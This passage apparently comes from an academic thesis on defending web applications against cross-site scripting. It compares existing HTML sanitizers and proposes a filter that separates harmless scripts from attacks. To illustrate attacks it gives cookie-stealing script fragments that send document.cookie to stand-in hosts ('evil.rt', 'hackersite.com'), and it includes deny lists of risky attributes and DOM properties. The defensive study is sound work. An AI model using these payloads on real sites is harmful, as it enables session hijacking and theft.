confused as they are clearly related [RRO]. Both attacks are aimed at the user and often require
the victim to access a malicious web page. Also the potential consequences of the two attack
vectors can be similar: The attacker is able to submit certain actions to the vulnerable web
application using the victim's identity. The causes of the two attack classes are different though.
A web application that is vulnerable to XSS fails to properly sanitize user provided data before
including this data on a webpage, thus allowing an attacker to include malicious JavaScript in the
web application. This JavaScript consequently is executed by the victim's browser and initiates
the malicious requests. XSS attacks have capabilities beyond the creation of HTTP requests
and are therefore more powerful than CSRF attacks. A rogue JavaScript has almost unlimited
power over the webpage it is embedded in and is able to communicate with the attacker. As an
example, XSS can obtain and leak sensitive information.
Cross-Site Scripting (XSS) exploits the trust that a client has in the website or
application. Users generally trust that the content displayed in their browsers is the same as the
content that the website being viewed intended to display. In contrast, CSRF exploits the trust that a
site has in the user. The website assumes that any 'action request' it receives
was sent intentionally by the user [ROB].
An attacker exploits a lack of input and/or output filtering in the case of an XSS flaw.
Filtering out dangerous characters such as <, >, “, ‘, &, ;, or # in an application could resolve the
XSS flaw. XSS is related to the application performing insufficient data validation. XSS flaws
may allow bypassing of any CSRF protections by leaking valid values of the tokens, allowing
Referer headers to appear to come from the application itself, or by hosting hostile HTML and JavaScript
elements right in the target application. Therefore resolving XSS flaws should be given priority
over CSRF weaknesses [CSRF].
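As a minimal illustration of output filtering for the dangerous characters mentioned above, the sketch below encodes them with the Python standard library function html.escape before the data is placed in a page. The wrapper name encode_for_html is hypothetical. Encoding of this kind only covers data placed in HTML text or quoted attribute values; it is not a complete XSS defense.

```python
import html


def encode_for_html(untrusted: str) -> str:
    """Replace HTML-significant characters with character references."""
    return html.escape(untrusted, quote=True)


comment = "<script>alert(document.cookie)</script>"
print(encode_for_html(comment))
```

After encoding, the browser displays the comment as text instead of executing it.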
XSS aims at inserting active code in an HTML document to either abuse client-side
active scripting holes, or to send privileged information (e.g. authentication/session cookies) to an
attacker-controlled site. CSRF does not in any way rely on client-side active scripting, and its
aim is to take unwanted, unapproved actions on a site where the victim has some prior
relationship and authority.
Where XSS seeks to steal the online trading cookies so that an attacker can manipulate the
victim’s portfolio, CSRF seeks to use the victim’s cookies to force the victim to execute a trade
without his knowledge or consent.
CHAPTER 3
EXISTING XSS DEFENSES
There is a dire need for web applications to provide users with the ability to format their
profile or postings using Hypertext Markup Language / Cascading Style Sheets (HTML/CSS). To
attain that functionality, developers must allow users to provide their own source code directly or
give the user an intermediate language with which the user can work.
As simple solutions, many lightweight markup languages other than HTML are
available, such as BBCode [BBC], Wikitext [WIT], Markdown [MAD], Textile [TEX], and WYSIWYG,
which are parsed by the message board system and then translated into a markup language that
web browsers understand (HTML or XHTML).
An example of intermediate-language code for rendering green text is shown below.
[color=green]Sample Text[/color]
After translation the above code would be rendered to the user’s browser in the target
language, HTML/CSS as seen below
Sample Text
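The translation step can be sketched as follows. This is a hypothetical translator that understands only the [color] tag; the function name bbcode_to_html and the choice of a span element with an inline color style as the output are assumptions made for illustration, not the behaviour of any particular message board.

```python
import html
import re

# Hypothetical rule set: only [color=name]...[/color] is understood.
COLOR_TAG = re.compile(r"\[color=([a-zA-Z]+)\](.*?)\[/color\]", re.DOTALL)


def bbcode_to_html(message: str) -> str:
    """Translate the [color] tag to HTML; everything else is shown as text."""
    escaped = html.escape(message)  # raw HTML typed by the user becomes inert text
    return COLOR_TAG.sub(r'<span style="color: \1">\2</span>', escaped)


print(bbcode_to_html("[color=green]Sample Text[/color]"))
```

Because the user never writes target-language code directly, only the constructs the translator knows about can reach the browser as markup.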
This is a safe approach in general because it does not allow users to specify arbitrary
target language code which can be obfuscated and disguised using various encoding and
fragmenting techniques. By providing an intermediate language and interpreting it in a top-down
fashion, the application renders only the subset of HTML functionality that it wishes to
interpret.
There is a practical problem with this approach. The user will be fairly limited in
formatting, because the limited instruction set provided by the web application is unlikely
ever to be as complete as the HTML/CSS specifications. Moreover, although the attributes and the
attribute values in these markup languages are not themselves vulnerable, the languages still face problems
related to the way they translate the intermediate markup into secure HTML/XHTML (i.e.,
the translated HTML is not guaranteed to be secure).
The other option when providing formatting capability is to allow users to input
HTML/CSS directly. If the user’s input cannot be trusted, it is imperative that the application be able
to detect and remove any malicious code. Several solutions have been developed to detect and remove
such malicious code. This chapter examines these solutions one by one in detail.
3.1 AntiSamy
The primary focus of the developers of AntiSamy [ANT] (named in reference to
Samy Kamkar’s now infamous MySpace XSS worm) was to create an XSS filter that works on a
positive and customizable security model. The secondary focus was to make this tool as user
friendly as possible so as to allow applications using it to communicate to the user how their
input was filtered or how they could tune it themselves in order to accommodate a more
successful filter.
AntiSamy first sanitizes the user-supplied input using NekoHTML to avoid false positives
caused by unbalanced start or end markers. NekoHTML is a standalone Java API that transforms broken
HTML of any version into clean XHTML 1.0.
The main validation processing takes place in a depth-first fashion. Starting with the root,
each node is processed according to the specifications that the security model XML file gives
for the node name (e.g., html or input). There are three modes of validation (also called
processing actions): filter, truncate and validate. Each is described in the following
section.
Filter
The filter processing action performs no validation per se, but only removes the start and
end tags, promoting the tag’s contents. This sanitization is useful in many cases. For example, if
you decided you wouldn’t like users to input meta tags that could mess with your robot indexing,
setting filter would have the effect demonstrated below.
User Input: This is some text.
Output after Filtering: This is some text.
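The effect of the filter action can be approximated in a few lines. AntiSamy itself works on a parsed DOM; the regular-expression version below is only a simplified sketch, and both the helper name filter_tag and the sample input are hypothetical.

```python
import re


def filter_tag(markup: str, tag: str) -> str:
    """Drop the start and end tags of `tag`, keeping whatever they enclosed."""
    pattern = re.compile(r"</?{}\b[^>]*>".format(re.escape(tag)), re.IGNORECASE)
    return pattern.sub("", markup)


user_input = '<meta name="robots" content="noindex">This is some text.'
print(filter_tag(user_input, "meta"))
```

Only the tags of the filtered element disappear; any nested markup and text are promoted unchanged.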
Truncate
When the truncate processing action is set, no actual validation takes place. The truncate
action simply removes all the attributes and child nodes of a tag, making validation of its
attributes unnecessary. A number of tags should be set to truncate.
User Input:
Output after Truncating:
Many formatting tags are set to truncate in the default policy file, including em, small,
big, i, b, u, center, pre and more.
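A rough sketch of the truncate action on a parsed element is given below, using the standard xml.etree.ElementTree module. It assumes that the element's own leading text is kept while attributes and child elements are dropped; the function name truncate and the sample markup are our own.

```python
import xml.etree.ElementTree as ET


def truncate(element: ET.Element) -> None:
    """Remove every attribute and child element, keeping the leading text."""
    text, tail = element.text, element.tail
    element.clear()  # clear() drops attributes, children, text and tail
    element.text, element.tail = text, tail


node = ET.fromstring('<b onclick="evil()">bold <i>nested</i></b>')
truncate(node)
print(ET.tostring(node, encoding="unicode"))
```

Since nothing but plain text survives, there are no attributes left to validate for a truncated tag.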
Validate
The validate processing action is where the meat of the filtering logic resides. If there are
no attributes defined for a tag by the policy file, the validate processing action will act the same
as the truncate processing action, except the child nodes will be validated instead of removed.
The validate action steps through each of the attributes in the tag to be filtered and checks
if there is a corresponding entry for that tag and attribute combination in the policy file. If no
entry is found, the attribute is simply removed. If there is an entry, the filter tries to validate its
value against the rules in the entry.
There are two ways for an attribute value to be validated: by being equal to a literal string
value or by matching a regular expression. Accordingly, each attribute’s definition in the
policy can have a list of valid literal strings and a list of regular expressions to match. This is a
departure from other XSS filters (and other security tools, in general) that don’t allow for
multiple ways to specify valid values, which forces the user into writing overly complex (and
likely incomplete or unpredictable) regular expressions.
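The two validation routes can be sketched as below. The AttributeRule class is a hypothetical stand-in for one attribute entry of the policy file, and the literal values and patterns are illustrative assumptions, not entries copied from antisamy.xml.

```python
import re
from dataclasses import dataclass, field


@dataclass
class AttributeRule:
    """Hypothetical stand-in for one attribute entry in the policy file."""
    literals: list = field(default_factory=list)
    patterns: list = field(default_factory=list)

    def accepts(self, value: str) -> bool:
        # Route 1: the value equals one of the literal strings.
        if value in self.literals:
            return True
        # Route 2: the whole value matches one of the regular expressions.
        return any(re.fullmatch(p, value) for p in self.patterns)


align = AttributeRule(literals=["left", "right", "center"])
width = AttributeRule(literals=["auto"], patterns=[r"\d{1,4}(px|%)?"])
```

Keeping simple cases as literals means the regular expressions only have to describe the genuinely open-ended values.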
When an attribute does not pass a validation check, one of a few onInvalid actions is
taken. The possible onInvalid actions dictate what to do with the tag and its contents. The set of
onInvalid actions includes removeTag, filterTag and removeAttribute. The default action is
removeAttribute.
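As a rough illustration of how the three onInvalid actions differ (each is described in detail in the text that follows), the sketch below applies them to a small parsed fragment with xml.etree.ElementTree. The function names, the sample message and the failing href value are assumptions for illustration; this is not AntiSamy's actual code.

```python
import xml.etree.ElementTree as ET


def _append_text(parent, index, text):
    """Re-attach loose text just before position `index` inside `parent`."""
    if not text:
        return
    if index == 0:
        parent.text = (parent.text or "") + text
    else:
        previous = parent[index - 1]
        previous.tail = (previous.tail or "") + text


def apply_on_invalid(parent, child, attribute, action="removeAttribute"):
    """Apply one onInvalid action to `child`, whose `attribute` failed validation."""
    index = list(parent).index(child)
    if action == "removeAttribute":
        child.attrib.pop(attribute, None)   # tag and contents stay
    elif action == "removeTag":
        parent.remove(child)                # tag and contents go
        _append_text(parent, index, child.tail)
    elif action == "filterTag":
        parent.remove(child)                # tags go, contents are promoted
        _append_text(parent, index, child.text)
        for offset, grandchild in enumerate(list(child)):
            parent.insert(index + offset, grandchild)
        _append_text(parent, index + len(child), child.tail)
    else:
        raise ValueError("unknown onInvalid action: " + action)


def demo(action):
    root = ET.fromstring('<p>Hi! <a href="javascript:evil()">Click on this!</a> Bye.</p>')
    apply_on_invalid(root, root.find("a"), "href", action)
    return ET.tostring(root, encoding="unicode")
```

Calling demo with each of the three action names shows the progressively stronger effect: the attribute alone is lost, the tag is lost but its text is kept, or the tag is lost together with its text.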
If an attribute with the removeTag set for its onInvalid action fails validation, the tag
holding the attribute being checked and its contents will be removed entirely. This onInvalid
action is reserved for those attributes, which when removed, make the presence of the tag
meaningless. An example usage of this setting is displayed below.
Welcome, my name is var cke = document.cookie; var url= ‘http://evil.rt/cookie.cgi’+cke; document.location = url; and I’m 25 years old!
Shown above is the message posted by the user. The result after this code fails validation
is shown below.
Welcome, my name is and I’m 25 years old!
If an attribute with an onInvalid action set to filterTag fails validation, the start and end
tag of the node will be removed while the contents are promoted. This is exactly what happens in
the filter processing action. The process can be seen below.
Click on this!
Shown above is the message posted by the user. The result after passing this message to
AntiSamy will be:
Click on this!
The default onInvalid action is removeAttribute. When this onInvalid action is set (or if
none is set) on an attribute that fails validation, the attribute itself is removed from the tag, but
the tag and its contents will remain. The process is shown below.
Shown above is the message posted by the user. The result after passing this message to
AntiSamy will be:
The knowledge base for the filter’s engine is an XML file called antisamy.xml. The same
policy file can be used across multiple implementations (.Net, J2EE, etc.). The default policy file
was tailored to W3C’s HTML 4.0 and CSS 2.0 specifications. Thus any official attribute
dictated by the specifications can be used. If a user agent supports an attribute not specified, it
can be added to the policy file, though some effort has already been put into integrating those
non-standard attributes which are being used and honored in the wild.
To summarize, OWASP AntiSamy is an API implemented in Java and .Net to ensure that
user-supplied HTML/CSS complies with an application’s rules. It has very good XSS
cleaning abilities, so long as it removes things it doesn’t recognize. Architecturally speaking,
OWASP AntiSamy is highly dependent on policy files, which are a highly extended form of XML
Schema with information on which attributes and elements to allow. As such, the actual code for
filtering is relatively lightweight. Unfortunately, while XML Schema files can give a high level
of control over the validation, the regular-expression-heavy approach begins showing signs of
stress when data types are complex (e.g. URIs).
3.2 The strip_tags()
The PHP function strip_tags() [STT] is the classic solution for attempting to clean up
HTML from unwanted tags. It is the worst solution of all for avoiding
XSS because it does not validate attributes at all, which means that anyone can insert
malicious scripts in attributes like onmouseover='xss();' and exploit the application. While this
can be patched with a series of regular expressions that strip out on[event] attributes, strip_tags() is
fundamentally flawed and should not be used. An example of using strip_tags() is illustrated below:
<?php
echo strip_tags($text, '<p><a>'); // Allow <p> and <a>
?>
In the above example, strip_tags() strips all tags except the <p> and <a> tags. In
this way malicious tags can be stripped out, but the values of attributes cannot be validated.
Attributes of tags could be validated by writing extra code at the server side, but
such a solution is neither efficient nor effective.
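The weakness is easy to demonstrate. The Python function below is a simplified stand-in that mimics tag-level stripping with an allow list; it is not PHP's implementation of strip_tags(), and the name strip_tags_like and the sample input are our own.

```python
import re

TAG = re.compile(r"</?([a-zA-Z][a-zA-Z0-9]*)\b[^>]*>")


def strip_tags_like(markup: str, allowed=("p", "a")) -> str:
    """Remove every tag whose name is not in `allowed`; attributes are never inspected."""
    def keep_or_drop(match):
        return match.group(0) if match.group(1).lower() in allowed else ""
    return TAG.sub(keep_or_drop, markup)


dirty = "<p onmouseover='xss();'>Hi</p><script>alert(1)</script>"
print(strip_tags_like(dirty))
```

The script tags are gone, but the allowed p tag passes through with its onmouseover handler intact, which is exactly the gap described above.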
3.3 PHP Input Filter
PHP Input Filter [PIF] is an upgraded version of strip_tags(), with the ability to inspect
attributes. PHP Input Filter implements an HTML parser, and performs very basic checks on
whether or not tags and attributes have been defined in the whitelist (what to permit is left up to
the user). Since it does not check well-formedness at all, it is trivially easy to trick the
filter into leaving unclosed tags. Anyone who allows the style attribute will be in great trouble, as
one cannot simply let CSS through and expect the layout not to be badly mutilated.
3.4 HTML_Safe/SafeHTML
The HTML_Safe/SafeHTML [HTS] mechanism of action involves parsing HTML with a
SAX parser and performing validation and filtering as the handlers are called. Whereas strip_tags() can only
strip tags, HTML_Safe strips down all active content, including tags, attributes and values of
attributes. This parser strips down all potentially dangerous content within HTML:
opening tag without its closing tag
closing tag without its opening tag
any of these tags: "base", "basefont", "head", "html", "body", "applet", "object",
"iframe", "frame", "frameset", "script", "layer", "ilayer", "embed", "bgsound", "link", "meta",
"style", "title", "blink", "xml" etc.
any of these attributes: on*, data*, dynsrc
javascript:/vbscript:/about: etc. protocols
expression/behavior etc. in styles
any other active content
It also tries to convert the code to valid XHTML, but htmltidy is a far better solution for this
task. HTML_Safe does a lot of things right, like blacklisting the list of dangerous attributes. But
blacklisting tags (like style, applet, etc.) because they have some dangerous attributes
results in a loss of functionality. In addition, it blocks all occurrences of XSS simply by stripping
them off.
3.5 Kses
Kses [KSS] is an HTML/XHTML filter written in PHP. It removes all unwanted HTML
elements and attributes, and it also does several checks on attribute values (to avoid buffer
overflow attacks). Kses can be used to avoid XSS, as it will only allow the HTML elements and
attributes that it was explicitly told to allow. It will remove additional "<" and ">" characters that
people may try to sneak in somewhere. The set of APIs that Kses offers its users is shown
below with explanations.
Table 3.1: Kses APIs
API | Functionality
Parse($string = "") | The basic function of kses. Give it a $string, and it will strip out the unwanted HTML and attributes.
AddProtocols() | Add a protocol or list of protocols to the kses object to be considered valid during a Parse(). The parameter can be a string containing a single protocol, or an array of strings, each containing a single protocol.
Protocols() | Deprecated. Use AddProtocols().
AddProtocol($protocol = "") | Adds a single protocol to the kses object that will be considered valid during a Parse().
SetProtocols() | This is a straight setting/overwrite of existing protocols in the kses object. All existing protocols are removed, and the parameter is used to determine what protocol(s) the kses object will consider valid. The parameter can be a string containing a single protocol, or an array of strings, each containing a single protocol.
DumpProtocols() | This returns an indexed array of the valid protocols contained in the kses object.
DumpElements() | This returns an associative array of the valid (X)HTML elements in the kses object along with attributes for each element, and tests that will be performed on each attribute.
AddHTML($tag = "", $attribs = array()) | This allows the end user to add a single (X)HTML element to the kses object along with the (if any) attributes that the specific (X)HTML element is allowed to have.
RemoveProtocol($protocol = "") | This allows for the removal of a single protocol from the list of valid protocols in the kses object.
RemoveProtocols() | This allows for the single or batch removal of protocols from the kses object. The parameter is either a string containing a protocol to be removed, or an array of strings that each contain a protocol.
filterKsesTextHook($string) | For the OOP (Object Oriented Programming) version of kses, this is an additional hook that allows the end user to perform additional postprocessing of a string that's being run through Parse().
_hook() | Deprecated. Use filterKsesTextHook().
Configuring and using the Kses APIs is simple and flexible: the user can set
the protocols to allow or disallow, and can configure the API to add or remove an
element or attribute from the preconfigured Kses. Users need to be very cautious in
using the APIs, as different ways of using them result in different functionality. However, Kses is not a
very good option, as it has many loopholes that have been exposed publicly by its users [GEL].
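The protocol-handling calls of Table 3.1 amount to maintaining an allow list of URL schemes. The class below is a hypothetical Python analogue written only to illustrate that idea; the class and method names, the default protocol set and the decision to accept scheme-less (relative) URLs are all assumptions and do not reproduce Kses itself.

```python
from urllib.parse import urlsplit


class ProtocolFilter:
    """Hypothetical analogue of the protocol-related calls in Table 3.1."""

    def __init__(self, protocols=("http", "https")):
        self._protocols = {p.lower() for p in protocols}

    def add_protocols(self, protocols):
        # Accept a single protocol or a list of protocols.
        if isinstance(protocols, str):
            protocols = [protocols]
        self._protocols.update(p.lower() for p in protocols)

    def remove_protocol(self, protocol):
        self._protocols.discard(protocol.lower())

    def dump_protocols(self):
        return sorted(self._protocols)

    def allows(self, url):
        # Relative URLs carry no scheme and are accepted in this sketch.
        scheme = urlsplit(url.strip()).scheme.lower()
        return scheme == "" or scheme in self._protocols


checker = ProtocolFilter()
```

A value such as javascript:alert(document.cookie) is rejected simply because its scheme was never added to the list.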
3.6 htmLawed
In its developer's words, the highly customizable htmLawed
[HTM, HTL] filter can be used to make text with HTML more secure and policy-compliant. It can
auto-correct and beautify HTML markup and restrict HTML elements (tags), attributes, and URL
protocols in the input. It also balances tags and checks for proper nesting of the HTML elements.
Furthermore, it can transform deprecated tags and attributes, check and convert character entities
(e.g., from hexadecimal to decimal type), obfuscate email addresses as an anti-spam measure,
etc. The set of features that htmLawed provides is quite appreciable. However, it simply strips
off all occurrences of script. It fails to validate scripts and to differentiate a simple script from
XSS.
On the other hand, web research [HTP] indicates that htmLawed is a modified version of Kses
(with some features added). It simply strips off the script tag in order to avoid execution of script, and
its validation of attribute values is not very good (it allows inclusion of cgi/javascript/html files, which
may lead to XSS).
3.7 Safe HTML Checker
Safe HTML Checker [SHC] is of the same flavor as the others, but it is a well-written piece of
code (strict in checking and parsing the tags). It is a whitelisting filter that filters out all
occurrences of tags not found in the filter list. It is very strict in filtering all occurrences of
script and CSS (Cascading Style Sheets). Safe HTML Checker was developed to satisfy the
requirements shown below.
1. Entered markup should be valid XHTML Strict, to stop comments from breaking
validation and keep things nice and tidy.
2. No presentational markup! They wanted web administrator to have complete control over
style sheets and comments posted should only be able to use structural HTML elements.
3. Attributes should be restricted to those that add semantic meaning. Javascript event
attributes and CSS related attributes should not be allowed.
4. Web Administrator should retain full control over the tags and attributes allowed in the
comments.
5. Submitted HTML must be kept free from anything that could pose a security risk, such as
javascript: URLs.
Focused on satisfying these requirements, the developer of Safe HTML Checker was not much
concerned about the loss of functionality caused by his solution.
3.8 HTML Purifier
HTML Purifier [HTP] is a standards-compliant HTML filter library written in PHP.
The developers of HTML Purifier claim that it removes all scripting code through thorough
auditing, which amounts to a loss of functionality. In stripping off all occurrences of script, it
is no different from the other existing solutions.
3.9 Summary
Regarding the available API/tool support, the present situation is not at all
encouraging. Even the combination of all the approaches is not promising for web application
security; hardly any tool supports the proper approach. The absence of a holistic approach to
identifying genuine XSS attacks is a real matter of concern for web application security.
CHAPTER 4
PROBLEM STATEMENT
A simple script inserted in a message is very often misunderstood as an XSS attack.
Scripting is a functionality provided for a better user experience. In existing solutions, any script
inserted is always assumed to be malicious and is stripped. For example, alert("XSS") is not
malicious because it does not harm the user. In contrast, alert(document.cookie) is malicious
because it is trying to access a browser DOM object (which is supposed to be secure). This
may lead to hijacking of the user session. In security terms, anything that harms a legitimate user
is an attack. Hence we claim that merely inserting a script does not by itself constitute an XSS attack.
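The distinction drawn above can be expressed as a very small check. The sketch below flags a script only when it refers to document.cookie, the one sensitive property named in this chapter; the function name is_malicious is hypothetical, and a plain textual match like this is easily evaded (for example by writing document["cookie"]), so it illustrates the idea rather than a usable filter.

```python
import re

# Illustrative deny list with a single entry taken from the example above.
SENSITIVE_DOM = re.compile(r"\bdocument\s*\.\s*cookie\b")


def is_malicious(script: str) -> bool:
    """Return True when the script text refers to a sensitive DOM property."""
    return SENSITIVE_DOM.search(script) is not None


print(is_malicious('alert("XSS")'))
print(is_malicious("alert(document.cookie)"))
```

Under this rule the first script would be left in place and only the second would be stripped.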
Having understood XSS attacks, another challenge that we identified in safeguarding
users from XSS attacks is whether to go with a server-side solution or a client-side solution. A client-side
solution can help users who are security conscious, who are familiar with XSS attacks and
who have some technical expertise (to use the solution we provide); such a solution may
not help novice users.
This project aims at developing a holistic server-side XSS API which differentiates an
XSS attack from a simple script and strips the attack off. Thus novice users can enjoy a safe and better
browsing experience without any loss of functionality or need for additional software or
configuration at the browser side. Developing such an API also reduces the burden on web administrators of
safeguarding their web applications from malignant XSS attacks.
CHAPTER 5
DIFFERENTIATING XSS FROM SIMPLE SCRIPTS
An analysis of the available and widely used solutions for XSS was presented in Chapter 3.
The points that existing solutions miss, and which give scope for a new set of problems,
were discussed in Chapter 4. This chapter revolves around the solution for the problem/challenge
identified.
It is well known that XSS occurs because of some malicious script inserted
by an attacker into the web application. Before we find what can be a malicious script, we should
find the scope an attacker has to insert malicious script in the web application. When the markup
languages were designed, none of the tags or their attributes was meant for malicious
purposes. They were made for genuine usage, but attackers/hackers use these tags and/or their
attributes for their own profit (typically for fame or theft). By our observation, we found
a list of tags and/or attributes which give scope for an attacker to insert malicious script;
it is shown in Table 5.1:
Table 5.1: Tags and their attributes which favour attackers
Tag | Attribute
form | action
body | background
applet | code
object | data
a, area, link | href
iframe, frame, img | longdesc
img | onabort
a, area, button, input, label, select, textarea | onblur
input, select, textarea | onchange
a, abbr, acronym, address, area, tt, i, b, small, big, body, button, caption, center, em, strong, dfn, code, samp, kbd, var, cite, col, colgroup, dd, del, dir, div, dl, dt, fieldset, form, h1 - h6, input, ins, label, legend, li, link, map, menu, noframes, noscript, ol, hr, img, optgroup, option, p, pre, q, s, strike, select, span, sub, sup, table, tbody, td, textarea, tfoot, th, thead, tr, u, ul | onclick, ondblclick, onkeydown, onkeypress, onkeyup, onmousedown, onmousemove, onmouseout, onmouseover, onmouseup
body, frameset | onload
a, area, button, input, label, select, textarea | onfocus
form | onreset
input, textarea | onselect
form | onsubmit
body, frameset | onunload
frame, iframe, img, input, script | src
a, abbr, acronym, address, applet, area, tt, i, b, small, big, basefont, bdo, blockquote, body, br, button, caption, center, em, strong, dfn, code, samp, kbd, var, cite, col, colgroup, dd, del, dir, div, dl, dt, fieldset, font, form, frame, frameset, h1 - h6, hr, iframe, img, input, ins, label, legend, li, link, map, menu, noframes, noscript, object, ol, optgroup, option, p, pre, q, s, strike, select, span, sub, sup, table, tbody, td, textarea, tfoot, th, thead, tr, u, ul | style
Having understood that the above tags and/or their attributes give scope for an attacker to
insert some malicious script, it is necessary to know how they are accessible to an
attacker. The total set of attributes found vulnerable can be categorized into three types:
1. Attributes giving scope for content from outside the actual page, such as href, src, etc.,
through which a page/object with some malicious content can be included in the
existing page.
2. Attributes which allow the user to write script directly, such as onload, onmouseover,
onclick, etc., through which some malicious script can be included.
3. Attributes which allow the user to style his content.
How these three categories differ can be understood better with examples.
The first type is the set of attributes which include an external object/content in the current/existing
page. To illustrate how these attributes can act maliciously, we’ll take the <input> tag of image type.
For the <input> tag of image type, some external image content is fed using an attribute
called “SRC”, which displays the image in the existing page. But an attacker will insert some
malicious script instead of feeding the location of the image. One such example is
shown below, which raises an alert with the session cookie every time the page is loaded. Merely
raising an alert is not exactly malicious, but since the alert exposes the user session cookie,
which is supposed to be secure, it is considered to be malicious.
The set of attributes that belong to this category are: action, background, classid, code,
data, href, longdesc, src.
Attributes of this type should be restricted in the external content they allow, based
on the tag and the type of attribute. The allowed set of extensions for each tag and its
attributes is shown below:
Table 5.2: Extensions allowed
Tag | Attribute | Allowed Extensions
img, input (type=image) | src, lowsrc, dynsrc | .jpg, .jpeg, .png, .xbm, .gif, .bmp
a, area, link | href | .htm, .html, .asp, .jsp, .php, .aspx, .swf, .rb, .pl, .cgi
frame, iframe | src | .jpg, .jpeg, .png, .xbm, .gif, .bmp, .htm, .html, .asp, .jsp, .php, .aspx
Any Tag | longdesc | .txt, .rtf, .doc
embed | src | .pdf, .doc, .wav
Any Tag | background | .jpg, .jpeg, .png, .xbm, .gif, .bmp
script | src | This attribute is not allowed
bgsound | src | .wav, .mid, .au
applet | code | .class
object | classid | .class, .py, .rb
object | data | .jpg, .jpeg, .png, .xbm, .gif, .bmp, .htm, .html, .asp, .jsp, .php, .aspx, .flv, .mov, .wmv, .rm, .ra, .ram
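A check of this kind can be sketched as a lookup keyed by tag and attribute. The code below encodes only a few rows of Table 5.2; the function name extension_allowed, the deny-by-default handling of unlisted combinations and the use of the URL path to find the extension are our assumptions for illustration.

```python
import posixpath
from urllib.parse import urlsplit

IMAGE = {".jpg", ".jpeg", ".png", ".xbm", ".gif", ".bmp"}

# A few rows of Table 5.2; combinations not listed here are denied in this sketch.
ALLOWED_EXTENSIONS = {
    ("img", "src"): IMAGE,
    ("a", "href"): {".htm", ".html", ".asp", ".jsp", ".php", ".aspx",
                    ".swf", ".rb", ".pl", ".cgi"},
    ("applet", "code"): {".class"},
    ("script", "src"): set(),  # "This attribute is not allowed"
}


def extension_allowed(tag: str, attribute: str, value: str) -> bool:
    """Check the file extension of an attribute value against the allow list."""
    allowed = ALLOWED_EXTENSIONS.get((tag.lower(), attribute.lower()), set())
    path = urlsplit(value.strip()).path
    extension = posixpath.splitext(path)[1].lower()
    return extension in allowed
```

An src value such as javascript:alert(document.cookie) has no image extension and is therefore rejected, while an ordinary image URL passes.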
The second type is the set of attributes which allow users to insert some script directly.
Allowing the user to insert script directly is similar to leaving a bank open 24 hours, which makes
it easy for a thief to rob the bank. But just as banks keep their security systems alert to protect their
customers’ wealth from thieves, the web administrator should make sure of the security system to
safeguard novice users. To understand how this type of attribute can be malicious, an
example is illustrated below, which opens a new window every time the page is loaded and
posts the novice user’s session cookie to the attacker’s site, through which session hijacking can be
done.
The set of attributes that belong to this category are: onblur, onclick, ondblclick, onfocus,
onmousedown, onmousemove, onmouseout, onmouseover, onmouseup, onkeydown, onkeypress,
onkeyup, onload, onunload, onabort, onchange, onreset, onselect, onsubmit.
The third and last kind of attribute set allows the user to set the style for his content.
The examples explained for the Type 1 and Type 2 categories of attributes are modified here to illustrate
how the third set of attributes can be exploited.
The only attribute that belongs to this category is style.
To save novice users from XSS, we should consider four more tags apart from all
the attributes listed above, namely the <script>, <base>, <style> and <form> tags. The <script> tag
will be used by an attacker to insert some malicious script directly. The <base> tag is generally
used to define the reference path for the content in the page. This also can be used by an attacker to
edit the path of reference or redirect it to his site. In the same way as the style attribute, the <style>
tag can be used to insert malicious script. Such an example is shown below:
background-image: url(window.open(
http://hackersite.com/info.pl?captcha=document.cookie
In the above example, instead of giving the background image URL, a malicious script
is given, which on execution will open a new window and send the user’s session cookie to the
hacker’s site.
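A style value can be screened by looking at what is passed to url(). The sketch below accepts a style only if every url() target is a plain http(s) address ending in one of the image extensions listed for the background attribute in Table 5.2; the function name style_is_safe and the two regular expressions are our assumptions for illustration.

```python
import re

# Capture whatever follows "url(" up to a quote, a closing parenthesis or the end.
URL_CALL = re.compile(r"url\(\s*['\"]?([^'\")]*)", re.IGNORECASE)
SAFE_IMAGE = re.compile(
    r"https?://[^\s()]+\.(?:jpg|jpeg|png|xbm|gif|bmp)", re.IGNORECASE
)


def style_is_safe(css: str) -> bool:
    """Accept the style only if every url() target looks like a plain image URL."""
    return all(SAFE_IMAGE.fullmatch(target.strip())
               for target in URL_CALL.findall(css))


attack = ("background-image: url(window.open("
          "http://hackersite.com/info.pl?captcha=document.cookie")
print(style_is_safe(attack))
```

The payload shown above fails the check because the url() argument begins with a script call rather than an image address.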
To save users from the XSS kind of phishing attack explained in Section 2.6.3, we
should consider the inner text and the action attribute of the <form> tag. An illustration of how the <form>
tag’s inner text can be used by an attacker is shown below:
User Name:
Password:
The example shown above creates an HTML form that displays two text boxes asking for
username and password and, on submit, posts the content to the hacker’s site. If an attacker posts
this message in a banking website’s user forum, an innocent user who visits this page may
log in, which may result in a huge loss for the user. Since the inner text of the <form> tag has such a
serious impact, it is always better to strip off any content in the <form> tag. Apart from the inner text of the
<form> tag, the ‘action’ attribute also can be used by an attacker to steal the user’s username and
password. An attacker will post a message with a <form> tag and some malicious script which will
replace the actual <form> tag with the inserted one. The obvious result of such a post is that it
causes huge losses to innocent users. Hence the ‘action’ attribute of the <form> tag also should be
removed from user-posted messages.
Having understood that the above tags and attributes allow an attacker to insert
scripts into a web application, and that not every inserted script is XSS, the next step is to find
out what sort of scripts make XSS possible.
As already stated, a script that harms is an attack. In the case of web applications, the harm
that can occur to users can be session hijacking, denial of service, phishing and alteration of the
page content. By stealing the user’s session cookies, an attacker can hijack a legitimate user session.
Denial of service can be done in many ways, like not allowing the user to visit the page he
wanted to visit by changing the page location, or throwing alerts endlessly, etc. Phishing can be
done by creating/editing the forms on the web page.
With the problem narrowed down to these possibilities, it is not difficult to find out what sort
of scripts cause such issues for a novice user. Our work on identifying malicious scripts
resulted in restricting access to a set of DOM properties. Table 5.3 shows DOM properties that
no attacker should be able to access, in order to protect the legitimate user.
Table 5.3: DOM Properties which will cause XSS attacks
DOM Property | Reason
Document.cookie | This property will be used to steal the innocent user session.
Document.location, Location.href, Location.replace, Location.reload, Window.location, Window.location.reload(), Window.top.location, location.assign, window.self.location, document.reload | These DOM properties will be used to edit the document location and make a denial of service attack.
Window.history, history.forward, history.go, history.back | This DOM property will be used to access history of the browser window, keep showing the pages from history and not allowing user to access the page he wants to visit.
Document.write, document.writeln | These properties will be used by an attacker to edit the page content.
Document.title | This property will be used to change the title of the page
Window.status, window.defaultStatus | These properties will be used to change the status of the page and create panic to legitimate user.
Document.getElementById, document.getElementsByName, document.getElementsByTagName | These properties will be used to set the values of tag attributes in the page
Document.anchors, document.forms, document.frames, document.images, document.links, window.frames | These properties will be used to set the values to the corresponding tags in the page.
To protect legitimate users from an attacker, we should find all occurrences of any of the
properties shown above in the attributes listed in Table 5.1 and strip them off. The same
applies not only to the attributes in Table 5.1 but also to the inner text of the script tag and
the style tag.
